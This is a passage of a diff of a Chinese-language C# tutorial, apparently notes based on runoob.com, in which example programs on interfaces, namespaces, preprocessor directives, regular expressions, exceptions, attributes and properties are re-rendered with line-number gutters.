                                          // Box1 详述
                                          Box1.setLength(6.0);
                                          Box1.setBreadth(7.0);
                                          Box1.setHeight(5.0);

                                          // Box2 详述
                                          Box2.setLength(12.0);
                                          Box2.setBreadth(13.0);
                                          Box2.setHeight(10.0);

                                          // Box1 的体积
                                          volume = Box1.getVolume();
                                          Console.WriteLine("Box1 的体积: {0}", volume);

                                          // Box2 的体积
                                          volume = Box2.getVolume();
                                          Console.WriteLine("Box2 的体积: {0}", volume);

                                          // 把两个对象相加
                                          Box3 = Box1 + Box2;

                                          // Box3 的体积
                                          volume = Box3.getVolume();
                                          Console.WriteLine("Box3 的体积: {0}", volume);
                                          Console.ReadKey();
                                          }
                                          }
                                          }
                                          +
                                          1
                                          2
                                          3
                                          Box1 的体积: 210
                                          Box2 的体积: 1560
                                          Box3 的体积: 5400

                                          可重载和不可重载运算符

                                          @@ -1192,13 +1190,13 @@

                                          using System;

                                          interface IMyInterface
                                          {
                                          // 接口成员
                                          void MethodToImplement();
                                          }

                                          class InterfaceImplementer : IMyInterface
                                          {
                                          static void Main()
                                          {
                                          InterfaceImplementer iImp = new InterfaceImplementer();
                                          iImp.MethodToImplement();
                                          }

                                          public void MethodToImplement()
                                          {
                                          Console.WriteLine("MethodToImplement() called.");
                                          }
                                          }
                                          -
                                          MethodToImplement() called.
                                          +
                                          1
                                          2
                                          3
                                          4
                                          5
                                          6
                                          7
                                          8
                                          9
                                          10
                                          11
                                          12
                                          13
                                          14
                                          15
                                          16
                                          17
                                          18
                                          19
                                          20
                                          21
                                          using System;

                                          interface IMyInterface
                                          {
                                          // 接口成员
                                          void MethodToImplement();
                                          }

                                          class InterfaceImplementer : IMyInterface
                                          {
                                          static void Main()
                                          {
                                          InterfaceImplementer iImp = new InterfaceImplementer();
                                          iImp.MethodToImplement();
                                          }

                                          public void MethodToImplement()
                                          {
                                          Console.WriteLine("MethodToImplement() called.");
                                          }
                                          }
                                          +
                                          1
                                          MethodToImplement() called.

                                          ​ 以下实例定义了两个接口 IMyInterfaceIParentInterface

                                          ​(接口可以继承其他接口)如果一个接口继承其他接口,那么实现类或结构就需要实现所有接口的成员。

                                          ​ 以下实例 IMyInterface 继承了 IParentInterface 接口,因此接口实现类必须实现 MethodToImplement()ParentInterfaceMethod() 方法:

                                          -
                                          using System;

                                          interface IParentInterface
                                          {
                                          void ParentInterfaceMethod();
                                          }

                                          interface IMyInterface : IParentInterface
                                          {
                                          void MethodToImplement();
                                          }

                                          class InterfaceImplementer : IMyInterface
                                          {
                                          static void Main()
                                          {
                                          InterfaceImplementer iImp = new InterfaceImplementer();
                                          iImp.MethodToImplement();
                                          iImp.ParentInterfaceMethod();
                                          }

                                          public void MethodToImplement()
                                          {
                                          Console.WriteLine("MethodToImplement() called.");
                                          }

                                          public void ParentInterfaceMethod()
                                          {
                                          Console.WriteLine("ParentInterfaceMethod() called.");
                                          }
                                          }
                                          -
                                          MethodToImplement() called.
                                          ParentInterfaceMethod() called.
                                          +
                                          1
                                          2
                                          3
                                          4
                                          5
                                          6
                                          7
                                          8
                                          9
                                          10
                                          11
                                          12
                                          13
                                          14
                                          15
                                          16
                                          17
                                          18
                                          19
                                          20
                                          21
                                          22
                                          23
                                          24
                                          25
                                          26
                                          27
                                          28
                                          29
                                          30
                                          31
                                          using System;

                                          interface IParentInterface
                                          {
                                          void ParentInterfaceMethod();
                                          }

                                          interface IMyInterface : IParentInterface
                                          {
                                          void MethodToImplement();
                                          }

                                          class InterfaceImplementer : IMyInterface
                                          {
                                          static void Main()
                                          {
                                          InterfaceImplementer iImp = new InterfaceImplementer();
                                          iImp.MethodToImplement();
                                          iImp.ParentInterfaceMethod();
                                          }

                                          public void MethodToImplement()
                                          {
                                          Console.WriteLine("MethodToImplement() called.");
                                          }

                                          public void ParentInterfaceMethod()
                                          {
                                          Console.WriteLine("ParentInterfaceMethod() called.");
                                          }
                                          }
                                          +
                                          1
                                          2
                                          MethodToImplement() called.
                                          ParentInterfaceMethod() called.

                                          C# 命名空间(Namespace)

                                          • C# 命名空间(Namespace)| 菜鸟教程 (runoob.com)
                                          • @@ -1206,19 +1204,19 @@

                                            命名空间的设计目的是提供一种让一组名称与其他名称分隔开的方式在一个命名空间中声明的类的名称与另一个命名空间中声明的相同的类的名称不冲突

                                            ​ 我们举一个计算机系统中的例子,一个文件夹(目录)中可以包含多个文件夹,每个文件夹中不能有相同的文件名,但不同文件夹中的文件可以重名。

                                            定义命名空间
                                            -
                                            using System;

                                            namespace first_space
                                            {
                                            class namespace_cl
                                            {
                                            public void func()
                                            {
                                            Console.WriteLine("Inside first_space");
                                            }
                                            }
                                            }
                                            namespace second_space
                                            {
                                            class namespace_cl
                                            {
                                            public void func()
                                            {
                                            Console.WriteLine("Inside second_space");
                                            }
                                            }
                                            }
                                            class TestClass
                                            {
                                            static void Main(string[] args)
                                            {
                                            first_space.namespace_cl fc = new first_space.namespace_cl();
                                            second_space.namespace_cl sc = new second_space.namespace_cl();
                                            fc.func();
                                            sc.func();
                                            Console.ReadKey();
                                            }
                                            }
                                            -
                                            Inside first_space
                                            Inside second_space
                                            +
                                            1
                                            2
                                            3
                                            4
                                            5
                                            6
                                            7
                                            8
                                            9
                                            10
                                            11
                                            12
                                            13
                                            14
                                            15
                                            16
                                            17
                                            18
                                            19
                                            20
                                            21
                                            22
                                            23
                                            24
                                            25
                                            26
                                            27
                                            28
                                            29
                                            30
                                            31
                                            32
                                            33
                                            using System;

                                            namespace first_space
                                            {
                                            class namespace_cl
                                            {
                                            public void func()
                                            {
                                            Console.WriteLine("Inside first_space");
                                            }
                                            }
                                            }
                                            namespace second_space
                                            {
                                            class namespace_cl
                                            {
                                            public void func()
                                            {
                                            Console.WriteLine("Inside second_space");
                                            }
                                            }
                                            }
                                            class TestClass
                                            {
                                            static void Main(string[] args)
                                            {
                                            first_space.namespace_cl fc = new first_space.namespace_cl();
                                            second_space.namespace_cl sc = new second_space.namespace_cl();
                                            fc.func();
                                            sc.func();
                                            Console.ReadKey();
                                            }
                                            }
                                            +
                                            1
                                            2
                                            Inside first_space
                                            Inside second_space
                                            using 关键字

                                            using 关键字表明程序使用的是给定命名空间中的名称。例如,我们在程序中使用 System 命名空间,其中定义了类 Console。我们可以只写:

                                            -
                                            Console.WriteLine ("Hello there");
                                            +
                                            1
                                            Console.WriteLine ("Hello there");

                                            ​ 我们可以写完全限定名称,如下:

                                            -
                                            System.Console.WriteLine("Hello there");
                                            +
                                            1
                                            System.Console.WriteLine("Hello there");

                                            ​ 您也可以使用 using 命名空间指令,这样在使用的时候就不用在前面加上命名空间名称。(类似于 C++ 里的 using namespace std;

                                            -
                                            using System;
                                            using first_space;
                                            using second_space;

                                            namespace first_space
                                            {
                                            class abc
                                            {
                                            public void func()
                                            {
                                            Console.WriteLine("Inside first_space");
                                            }
                                            }
                                            }
                                            namespace second_space
                                            {
                                            class efg
                                            {
                                            public void func()
                                            {
                                            Console.WriteLine("Inside second_space");
                                            }
                                            }
                                            }
                                            class TestClass
                                            {
                                            static void Main(string[] args)
                                            {
                                            abc fc = new abc();
                                            efg sc = new efg();
                                            fc.func();
                                            sc.func();
                                            Console.ReadKey();
                                            }
                                            }
                                            -
                                            Inside first_space
                                            Inside second_space
                                            +
                                            1
                                            2
                                            3
                                            4
                                            5
                                            6
                                            7
                                            8
                                            9
                                            10
                                            11
                                            12
                                            13
                                            14
                                            15
                                            16
                                            17
                                            18
                                            19
                                            20
                                            21
                                            22
                                            23
                                            24
                                            25
                                            26
                                            27
                                            28
                                            29
                                            30
                                            31
                                            32
                                            33
                                            34
                                            35
                                            using System;
                                            using first_space;
                                            using second_space;

                                            namespace first_space
                                            {
                                            class abc
                                            {
                                            public void func()
                                            {
                                            Console.WriteLine("Inside first_space");
                                            }
                                            }
                                            }
                                            namespace second_space
                                            {
                                            class efg
                                            {
                                            public void func()
                                            {
                                            Console.WriteLine("Inside second_space");
                                            }
                                            }
                                            }
                                            class TestClass
                                            {
                                            static void Main(string[] args)
                                            {
                                            abc fc = new abc();
                                            efg sc = new efg();
                                            fc.func();
                                            sc.func();
                                            Console.ReadKey();
                                            }
                                            }
                                            +
                                            1
                                            2
                                            Inside first_space
                                            Inside second_space
                                            嵌套命名空间

                                            ​ 命名空间可以被嵌套,即您可以在一个命名空间内定义另一个命名空间,如下所示:

                                            -
                                            using System;
                                            using SomeNameSpace;
                                            using SomeNameSpace.Nested;

                                            namespace SomeNameSpace
                                            {
                                            public class MyClass
                                            {
                                            static void Main()
                                            {
                                            Console.WriteLine("In SomeNameSpace");
                                            Nested.NestedNameSpaceClass.SayHello();
                                            }
                                            }

                                            // 内嵌命名空间
                                            namespace Nested
                                            {
                                            public class NestedNameSpaceClass
                                            {
                                            public static void SayHello()
                                            {
                                            Console.WriteLine("In Nested");
                                            }
                                            }
                                            }
                                            }
                                            +
                                            1
                                            2
                                            3
                                            4
                                            5
                                            6
                                            7
                                            8
                                            9
                                            10
                                            11
                                            12
                                            13
                                            14
                                            15
                                            16
                                            17
                                            18
                                            19
                                            20
                                            21
                                            22
                                            23
                                            24
                                            25
                                            26
                                            27
                                            using System;
                                            using SomeNameSpace;
                                            using SomeNameSpace.Nested;

                                            namespace SomeNameSpace
                                            {
                                            public class MyClass
                                            {
                                            static void Main()
                                            {
                                            Console.WriteLine("In SomeNameSpace");
                                            Nested.NestedNameSpaceClass.SayHello();
                                            }
                                            }

                                            // 内嵌命名空间
                                            namespace Nested
                                            {
                                            public class NestedNameSpaceClass
                                            {
                                            public static void SayHello()
                                            {
                                            Console.WriteLine("In Nested");
                                            }
                                            }
                                            }
                                            }

                                            C# 预处理器指令

                                            • C# 预处理器指令 | 菜鸟教程 (runoob.com)
                                            • @@ -1294,19 +1292,19 @@

                                              #define 和 #undef 预处理器

                                              #define 用于定义符号(通常用于条件编译),#undef 用于取消定义符号。

                                              -
                                              #define DEBUG

                                              #undef RELEASE
                                              +
                                              1
                                              2
                                              3
                                              #define DEBUG

                                              #undef RELEASE

                                              ​ #define 允许您定义一个符号,这样,通过使用符号作为传递给 #if 指令的表达式,表达式将返回 true。它的语法如下:

                                              -
                                              #define PI 
                                              using System;
                                              namespace PreprocessorDAppl
                                              {
                                              class Program
                                              {
                                              static void Main(string[] args)
                                              {
                                              #if (PI)
                                              Console.WriteLine("PI is defined");
                                              #else
                                              Console.WriteLine("PI is not defined");
                                              #endif
                                              Console.ReadKey();
                                              }
                                              }
                                              }
                                              -
                                              PI is defined
                                              +
                                              1
                                              2
                                              3
                                              4
                                              5
                                              6
                                              7
                                              8
                                              9
                                              10
                                              11
                                              12
                                              13
                                              14
                                              15
                                              16
                                              17
                                              #define PI 
                                              using System;
                                              namespace PreprocessorDAppl
                                              {
                                              class Program
                                              {
                                              static void Main(string[] args)
                                              {
                                              #if (PI)
                                              Console.WriteLine("PI is defined");
                                              #else
                                              Console.WriteLine("PI is not defined");
                                              #endif
                                              Console.ReadKey();
                                              }
                                              }
                                              }
                                              +
                                              1
                                              PI is defined

                                              条件指令:#if, #elif, #else 和 #endif

                                              ​ 您可以使用 #if 指令来创建一个条件指令。

                                              ​ 条件指令用于测试符号是否为真。如果为真,编译器会执行 #if 和下一个指令之间的代码。

                                              ​ 条件指令的语法:

                                              -
                                              #define DEBUG
                                              #define VC_V10
                                              using System;
                                              public class TestClass
                                              {
                                              public static void Main()
                                              {

                                              #if (DEBUG && !VC_V10)
                                              Console.WriteLine("DEBUG is defined");
                                              #elif (!DEBUG && VC_V10)
                                              Console.WriteLine("VC_V10 is defined");
                                              #elif (DEBUG && VC_V10)
                                              Console.WriteLine("DEBUG and VC_V10 are defined");
                                              #else
                                              Console.WriteLine("DEBUG and VC_V10 are not defined");
                                              #endif
                                              Console.ReadKey();
                                              }
                                              }
                                              -
                                              DEBUG and VC_V10 are defined
                                              +
                                              1
                                              2
                                              3
                                              4
                                              5
                                              6
                                              7
                                              8
                                              9
                                              10
                                              11
                                              12
                                              13
                                              14
                                              15
                                              16
                                              17
                                              18
                                              19
                                              20
                                              #define DEBUG
                                              #define VC_V10
                                              using System;
                                              public class TestClass
                                              {
                                              public static void Main()
                                              {

                                              #if (DEBUG && !VC_V10)
                                              Console.WriteLine("DEBUG is defined");
                                              #elif (!DEBUG && VC_V10)
                                              Console.WriteLine("VC_V10 is defined");
                                              #elif (DEBUG && VC_V10)
                                              Console.WriteLine("DEBUG and VC_V10 are defined");
                                              #else
                                              Console.WriteLine("DEBUG and VC_V10 are not defined");
                                              #endif
                                              Console.ReadKey();
                                              }
                                              }
                                              +
                                              1
                                              DEBUG and VC_V10 are defined

                                              #pragma

                                              ​ 用于向编译器发送特殊指令。最常见的用法是禁用特定的警告。

                                              -
                                              #pragma warning disable 414
                                              private int unusedVariable;
                                              #pragma warning restore 414
                                              +
                                              1
                                              2
                                              3
                                              #pragma warning disable 414
                                              private int unusedVariable;
                                              #pragma warning restore 414

                                              使用预处理器指令的注意事项

                                              • 提高代码可读性:使用 #region 可以帮助分隔代码块,提高代码的组织性。
                                              • @@ -1319,8 +1317,8 @@

                                                C# 正则表达式 | 菜鸟教程 (runoob.com)

                                              ​ 其实我觉得可以用 ChatGPT 帮自己写正则表达式。

                                              -
                                              using System;
                                              using System.Text.RegularExpressions;

                                              public class Example
                                              {
                                              public static void Main()
                                              {
                                              string input = "1851 1999 1950 1905 2003";
                                              string pattern = @"(?<=19)\d{2}\b";

                                              foreach (Match match in Regex.Matches(input, pattern))
                                              Console.WriteLine(match.Value);
                                              }
                                              }
                                              -
                                              99
                                              50
                                              05
                                              +
                                              1
                                              2
                                              3
                                              4
                                              5
                                              6
                                              7
                                              8
                                              9
                                              10
                                              11
                                              12
                                              13
                                              14
                                              using System;
                                              using System.Text.RegularExpressions;

                                              public class Example
                                              {
                                              public static void Main()
                                              {
                                              string input = "1851 1999 1950 1905 2003";
                                              string pattern = @"(?<=19)\d{2}\b";

                                              foreach (Match match in Regex.Matches(input, pattern))
                                              Console.WriteLine(match.Value);
                                              }
                                              }
                                              +
                                              1
                                              2
                                              3
                                              99
                                              50
                                              05

                                              C# 异常处理

                                              • C# 异常处理 | 菜鸟教程 (runoob.com)
                                              • @@ -1389,15 +1387,15 @@

                                                异常处理

                                                ​ C# 以 try 和 catch 块的形式提供了一种结构化的异常处理方案。使用这些块,把核心程序语句与错误处理语句分离开。

                                                ​ 这些错误处理块是使用 trycatch(若发生异常,执行)和 finally(无论是否有异常,均执行)关键字实现的。下面是一个当除以零时抛出异常的实例:

                                                -
                                                using System;
                                                namespace ErrorHandlingApplication
                                                {
                                                class DivNumbers
                                                {
                                                int result;
                                                DivNumbers()
                                                {
                                                result = 0;
                                                }
                                                public void division(int num1, int num2)
                                                {
                                                try
                                                {
                                                result = num1 / num2;
                                                }
                                                catch (DivideByZeroException e)
                                                {
                                                Console.WriteLine("Exception caught: {0}", e);
                                                }
                                                finally
                                                {
                                                Console.WriteLine("Result: {0}", result);
                                                }

                                                }
                                                static void Main(string[] args)
                                                {
                                                DivNumbers d = new DivNumbers();
                                                d.division(25, 0);
                                                d.division(25, 5);
                                                Console.ReadKey();
                                                }
                                                }
                                                }
                                                -
                                                Exception caught: System.DivideByZeroException: 尝试除以零。
                                                在 ErrorHandlingApplication.DivNumbers.division(Int32 num1, Int32 num2) 位置 XXX.cs:行号 15
                                                Result: 0
                                                Result: 5
                                                +
                                                1
                                                2
                                                3
                                                4
                                                5
                                                6
                                                7
                                                8
                                                9
                                                10
                                                11
                                                12
                                                13
                                                14
                                                15
                                                16
                                                17
                                                18
                                                19
                                                20
                                                21
                                                22
                                                23
                                                24
                                                25
                                                26
                                                27
                                                28
                                                29
                                                30
                                                31
                                                32
                                                33
                                                34
                                                35
                                                using System;
                                                namespace ErrorHandlingApplication
                                                {
                                                class DivNumbers
                                                {
                                                int result;
                                                DivNumbers()
                                                {
                                                result = 0;
                                                }
                                                public void division(int num1, int num2)
                                                {
                                                try
                                                {
                                                result = num1 / num2;
                                                }
                                                catch (DivideByZeroException e)
                                                {
                                                Console.WriteLine("Exception caught: {0}", e);
                                                }
                                                finally
                                                {
                                                Console.WriteLine("Result: {0}", result);
                                                }

                                                }
                                                static void Main(string[] args)
                                                {
                                                DivNumbers d = new DivNumbers();
                                                d.division(25, 0);
                                                d.division(25, 5);
                                                Console.ReadKey();
                                                }
                                                }
                                                }
                                                +
                                                1
                                                2
                                                3
                                                4
                                                Exception caught: System.DivideByZeroException: 尝试除以零。
                                                在 ErrorHandlingApplication.DivNumbers.division(Int32 num1, Int32 num2) 位置 XXX.cs:行号 15
                                                Result: 0
                                                Result: 5
                                                创建用户自定义异常

                                                ​ 您也可以定义自己的异常。用户自定义的异常类是派生自 ApplicationException 类。使用 throw 来抛出异常。下面的实例演示了这点:

                                                -
                                                using System;
                                                namespace UserDefinedException
                                                {
                                                class TestTemperature
                                                {
                                                static void Main(string[] args)
                                                {
                                                Temperature temp = new Temperature();
                                                try
                                                {
                                                temp.showTemp();
                                                }
                                                catch (TempIsZeroException e)
                                                {
                                                Console.WriteLine("TempIsZeroException: {0}", e.Message);
                                                }
                                                Console.ReadKey();
                                                }
                                                }
                                                }
                                                public class TempIsZeroException : ApplicationException
                                                {
                                                public TempIsZeroException(string message) : base(message)
                                                {
                                                }
                                                }
                                                public class Temperature
                                                {
                                                int temperature = 0;
                                                public void showTemp()
                                                {
                                                if (temperature == 0)
                                                {
                                                throw (new TempIsZeroException("Zero Temperature found"));
                                                }
                                                else
                                                {
                                                Console.WriteLine("Temperature: {0}", temperature);
                                                }
                                                }
                                                }
                                                -
                                                TempIsZeroException: Zero Temperature found
                                                +
                                                1
                                                2
                                                3
                                                4
                                                5
                                                6
                                                7
                                                8
                                                9
                                                10
                                                11
                                                12
                                                13
                                                14
                                                15
                                                16
                                                17
                                                18
                                                19
                                                20
                                                21
                                                22
                                                23
                                                24
                                                25
                                                26
                                                27
                                                28
                                                29
                                                30
                                                31
                                                32
                                                33
                                                34
                                                35
                                                36
                                                37
                                                38
                                                39
                                                40
                                                41
                                                using System;
                                                namespace UserDefinedException
                                                {
                                                class TestTemperature
                                                {
                                                static void Main(string[] args)
                                                {
                                                Temperature temp = new Temperature();
                                                try
                                                {
                                                temp.showTemp();
                                                }
                                                catch (TempIsZeroException e)
                                                {
                                                Console.WriteLine("TempIsZeroException: {0}", e.Message);
                                                }
                                                Console.ReadKey();
                                                }
                                                }
                                                }
                                                public class TempIsZeroException : ApplicationException
                                                {
                                                public TempIsZeroException(string message) : base(message)
                                                {
                                                }
                                                }
                                                public class Temperature
                                                {
                                                int temperature = 0;
                                                public void showTemp()
                                                {
                                                if (temperature == 0)
                                                {
                                                throw (new TempIsZeroException("Zero Temperature found"));
                                                }
                                                else
                                                {
                                                Console.WriteLine("Temperature: {0}", temperature);
                                                }
                                                }
                                                }
                                                +
                                                1
                                                TempIsZeroException: Zero Temperature found
                                                抛出对象

                                                ​ 如果异常是直接或间接派生自 System.Exception 类,您可以抛出一个对象。您可以在 catch 块中使用 throw 语句来抛出当前的对象,如下所示:

                                                -
                                                Catch(Exception e)
                                                {
                                                ...
                                                Throw e
                                                }
                                                +
                                                1
                                                2
                                                3
                                                4
                                                5
                                                Catch(Exception e)
                                                {
                                                ...
                                                Throw e
                                                }

                                                C# 文件的输入与输出

                                                ​ 一个 文件 是一个存储在磁盘中带有指定名称和目录路径的数据集合。当打开文件进行读写时,它变成一个

                                                ​ 从根本上说,流是通过通信路径传递的字节序列。有两个主要的流:输入流输出流输入流用于从文件读取数据(读操作),输出流用于向文件写入数据(写操作)。

                                                @@ -1443,8 +1441,8 @@

                                                创建自定义特性(Attribute)

                                                ​ 一个新的自定义特性应派生自 System.Attribute 类。

                                                -
                                                // 一个自定义特性 BugFix 被赋给类及其成员
                                                using System;

                                                [AttributeUsage(AttributeTargets.Class |
                                                AttributeTargets.Constructor |
                                                AttributeTargets.Field |
                                                AttributeTargets.Method |
                                                AttributeTargets.Property,
                                                AllowMultiple = true)]

                                                public class DeBugInfo : System.Attribute
                                                {
                                                private int bugNo;
                                                private string developer;
                                                private string lastReview;
                                                public string message;

                                                public DeBugInfo(int bg, string dev, string d)
                                                {
                                                this.bugNo = bg;
                                                this.developer = dev;
                                                this.lastReview = d;
                                                }

                                                public int BugNo
                                                {
                                                get
                                                {
                                                return bugNo;
                                                }
                                                }
                                                public string Developer
                                                {
                                                get
                                                {
                                                return developer;
                                                }
                                                }
                                                public string LastReview
                                                {
                                                get
                                                {
                                                return lastReview;
                                                }
                                                }
                                                public string Message
                                                {
                                                get
                                                {
                                                return message;
                                                }
                                                set
                                                {
                                                message = value;
                                                }
                                                }
                                                }

                                                [DeBugInfo(45, "Zara Ali", "12/8/2012", Message = "Return type mismatch")]
                                                [DeBugInfo(49, "Nuha Ali", "10/10/2012", Message = "Unused variable")]
                                                class Rectangle
                                                {
                                                // 成员变量
                                                protected double length;
                                                protected double width;
                                                public Rectangle(double l, double w)
                                                {
                                                length = l;
                                                width = w;
                                                }
                                                [DeBugInfo(55, "Zara Ali", "19/10/2012",
                                                Message = "Return type mismatch")]
                                                public double GetArea()
                                                {
                                                return length * width;
                                                }
                                                [DeBugInfo(56, "Zara Ali", "19/10/2012")]
                                                public void Display()
                                                {
                                                Console.WriteLine("Length: {0}", length);
                                                Console.WriteLine("Width: {0}", width);
                                                Console.WriteLine("Area: {0}", GetArea());
                                                }
                                                }

                                                class Program
                                                {
                                                static void Main(string[] args)
                                                {
                                                Rectangle r = new Rectangle(5, 8);
                                                r.Display();
                                                }
                                                }
                                                -
                                                Length: 5
                                                Width: 8
                                                Area: 40
                                                +
                                                1
                                                2
                                                3
                                                4
                                                5
                                                6
                                                7
                                                8
                                                9
                                                10
                                                11
                                                12
                                                13
                                                14
                                                15
                                                16
                                                17
                                                18
                                                19
                                                20
                                                21
                                                22
                                                23
                                                24
                                                25
                                                26
                                                27
                                                28
                                                29
                                                30
                                                31
                                                32
                                                33
                                                34
                                                35
                                                36
                                                37
                                                38
                                                39
                                                40
                                                41
                                                42
                                                43
                                                44
                                                45
                                                46
                                                47
                                                48
                                                49
                                                50
                                                51
                                                52
                                                53
                                                54
                                                55
                                                56
                                                57
                                                58
                                                59
                                                60
                                                61
                                                62
                                                63
                                                64
                                                65
                                                66
                                                67
                                                68
                                                69
                                                70
                                                71
                                                72
                                                73
                                                74
                                                75
                                                76
                                                77
                                                78
                                                79
                                                80
                                                81
                                                82
                                                83
                                                84
                                                85
                                                86
                                                87
                                                88
                                                89
                                                90
                                                91
                                                92
                                                93
                                                // 一个自定义特性 BugFix 被赋给类及其成员
                                                using System;

                                                [AttributeUsage(AttributeTargets.Class |
                                                AttributeTargets.Constructor |
                                                AttributeTargets.Field |
                                                AttributeTargets.Method |
                                                AttributeTargets.Property,
                                                AllowMultiple = true)]

                                                public class DeBugInfo : System.Attribute
                                                {
                                                private int bugNo;
                                                private string developer;
                                                private string lastReview;
                                                public string message;

                                                public DeBugInfo(int bg, string dev, string d)
                                                {
                                                this.bugNo = bg;
                                                this.developer = dev;
                                                this.lastReview = d;
                                                }

                                                public int BugNo
                                                {
                                                get
                                                {
                                                return bugNo;
                                                }
                                                }
                                                public string Developer
                                                {
                                                get
                                                {
                                                return developer;
                                                }
                                                }
                                                public string LastReview
                                                {
                                                get
                                                {
                                                return lastReview;
                                                }
                                                }
                                                public string Message
                                                {
                                                get
                                                {
                                                return message;
                                                }
                                                set
                                                {
                                                message = value;
                                                }
                                                }
                                                }

                                                [DeBugInfo(45, "Zara Ali", "12/8/2012", Message = "Return type mismatch")]
                                                [DeBugInfo(49, "Nuha Ali", "10/10/2012", Message = "Unused variable")]
                                                class Rectangle
                                                {
                                                // 成员变量
                                                protected double length;
                                                protected double width;
                                                public Rectangle(double l, double w)
                                                {
                                                length = l;
                                                width = w;
                                                }
                                                [DeBugInfo(55, "Zara Ali", "19/10/2012",
                                                Message = "Return type mismatch")]
                                                public double GetArea()
                                                {
                                                return length * width;
                                                }
                                                [DeBugInfo(56, "Zara Ali", "19/10/2012")]
                                                public void Display()
                                                {
                                                Console.WriteLine("Length: {0}", length);
                                                Console.WriteLine("Width: {0}", width);
                                                Console.WriteLine("Area: {0}", GetArea());
                                                }
                                                }

                                                class Program
                                                {
                                                static void Main(string[] args)
                                                {
                                                Rectangle r = new Rectangle(5, 8);
                                                r.Display();
                                                }
                                                }
                                                +
                                                1
                                                2
                                                3
                                                Length: 5
                                                Width: 8
                                                Area: 40

                                                C# 反射(Reflection)

                                                ​ 反射指程序可以访问、检测和修改它本身状态或行为的一种能力。

                                                ​ 程序集包含模块,而模块包含类型,类型又包含成员。反射则提供了封装程序集、模块和类型的对象。

                                                @@ -1469,16 +1467,16 @@

                                                using System;

                                                [AttributeUsage(AttributeTargets.All)]
                                                public class HelpAttribute : System.Attribute
                                                {
                                                public readonly string Url;

                                                public string Topic // Topic 是一个命名(named)参数
                                                {
                                                get
                                                {
                                                return topic;
                                                }
                                                set
                                                {

                                                topic = value;
                                                }
                                                }

                                                public HelpAttribute(string url) // url 是一个定位(positional)参数
                                                {
                                                this.Url = url;
                                                }

                                                public override string ToString()
                                                {
                                                return base.ToString() + ": "+ this.Url;
                                                }

                                                private string topic;
                                                }
                                                [HelpAttribute("Information on the class MyClass")]
                                                class MyClass
                                                {
                                                }

                                                namespace AttributeAppl
                                                {
                                                class Program
                                                {
                                                static void Main(string[] args)
                                                {
                                                System.Reflection.MemberInfo info = typeof(MyClass);
                                                object[] attributes = info.GetCustomAttributes(true);
                                                for (int i = 0; i < attributes.Length; i++)
                                                {
                                                System.Console.WriteLine(attributes[i]);
                                                }
                                                Console.ReadKey();

                                                }
                                                }
                                                }
                                                -
                                                HelpAttribute: Information on the class MyClass
                                                +
                                                1
                                                2
                                                3
                                                4
                                                5
                                                6
                                                7
                                                8
                                                9
                                                10
                                                11
                                                12
                                                13
                                                14
                                                15
                                                16
                                                17
                                                18
                                                19
                                                20
                                                21
                                                22
                                                23
                                                24
                                                25
                                                26
                                                27
                                                28
                                                29
                                                30
                                                31
                                                32
                                                33
                                                34
                                                35
                                                36
                                                37
                                                38
                                                39
                                                40
                                                41
                                                42
                                                43
                                                44
                                                45
                                                46
                                                47
                                                48
                                                49
                                                50
                                                51
                                                52
                                                53
                                                54
                                                using System;

                                                [AttributeUsage(AttributeTargets.All)]
                                                public class HelpAttribute : System.Attribute
                                                {
                                                public readonly string Url;

                                                public string Topic // Topic 是一个命名(named)参数
                                                {
                                                get
                                                {
                                                return topic;
                                                }
                                                set
                                                {

                                                topic = value;
                                                }
                                                }

                                                public HelpAttribute(string url) // url 是一个定位(positional)参数
                                                {
                                                this.Url = url;
                                                }

                                                public override string ToString()
                                                {
                                                return base.ToString() + ": "+ this.Url;
                                                }

                                                private string topic;
                                                }
                                                [HelpAttribute("Information on the class MyClass")]
                                                class MyClass
                                                {
                                                }

                                                namespace AttributeAppl
                                                {
                                                class Program
                                                {
                                                static void Main(string[] args)
                                                {
                                                System.Reflection.MemberInfo info = typeof(MyClass);
                                                object[] attributes = info.GetCustomAttributes(true);
                                                for (int i = 0; i < attributes.Length; i++)
                                                {
                                                System.Console.WriteLine(attributes[i]);
                                                }
                                                Console.ReadKey();

                                                }
                                                }
                                                }
                                                +
                                                1
                                                HelpAttribute: Information on the class MyClass

                                                C# 属性(Property)

                                                属性(Property) 是类(class)、结构(structure)和接口(interface)的命名(named)成员。类或结构中的成员变量或方法称为 域(Field)。属性(Property)是域(Field)的扩展,且可使用相同的语法来访问。它们使用 访问器(accessors) 让私有域的值可被读写或操作。

                                                ​ 属性(Property)不会确定存储位置。相反,它们具有可读写或计算它们值的 访问器(accessors)

                                                ​ 例如,有一个名为 Student 的类,带有 age、name 和 code 的私有域。我们不能在类的范围以外直接访问这些域,但是我们可以拥有访问这些私有域的属性

                                                访问器(Accessors)

                                                ​ 属性(Property)的访问器(accessor)包含有助于获取(读取或计算)或设置(写入)属性的可执行语句。访问器(accessor)声明可包含一个 get 访问器一个 set 访问器,或者同时包含二者。例如:

                                                -
                                                using System;
                                                namespace runoob
                                                {
                                                class Student
                                                {

                                                private string code = "N.A";
                                                private string name = "not known";
                                                private int age = 0;

                                                // 声明类型为 string 的 Code 属性
                                                public string Code
                                                {
                                                get
                                                {
                                                return code;
                                                }
                                                set
                                                {
                                                code = value;
                                                }
                                                }

                                                // 声明类型为 string 的 Name 属性
                                                public string Name
                                                {
                                                get
                                                {
                                                return name;
                                                }
                                                set
                                                {
                                                name = value;
                                                }
                                                }

                                                // 声明类型为 int 的 Age 属性
                                                public int Age
                                                {
                                                get
                                                {
                                                return age;
                                                }
                                                set
                                                {
                                                age = value;
                                                }
                                                }
                                                public override string ToString()
                                                {
                                                return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
                                                }
                                                }
                                                class ExampleDemo
                                                {
                                                public static void Main()
                                                {
                                                // 创建一个新的 Student 对象
                                                Student s = new Student();

                                                // 设置 student 的 code、name 和 age
                                                s.Code = "001";
                                                s.Name = "Zara";
                                                s.Age = 9;
                                                Console.WriteLine("Student Info: {0}", s);
                                                // 增加年龄
                                                s.Age += 1;
                                                Console.WriteLine("Student Info: {0}", s);
                                                Console.ReadKey();
                                                }
                                                }
                                                }
                                                -
                                                Student Info: Code = 001, Name = Zara, Age = 9
                                                Student Info: Code = 001, Name = Zara, Age = 10
                                                +
                                                1
                                                2
                                                3
                                                4
                                                5
                                                6
                                                7
                                                8
                                                9
                                                10
                                                11
                                                12
                                                13
                                                14
                                                15
                                                16
                                                17
                                                18
                                                19
                                                20
                                                21
                                                22
                                                23
                                                24
                                                25
                                                26
                                                27
                                                28
                                                29
                                                30
                                                31
                                                32
                                                33
                                                34
                                                35
                                                36
                                                37
                                                38
                                                39
                                                40
                                                41
                                                42
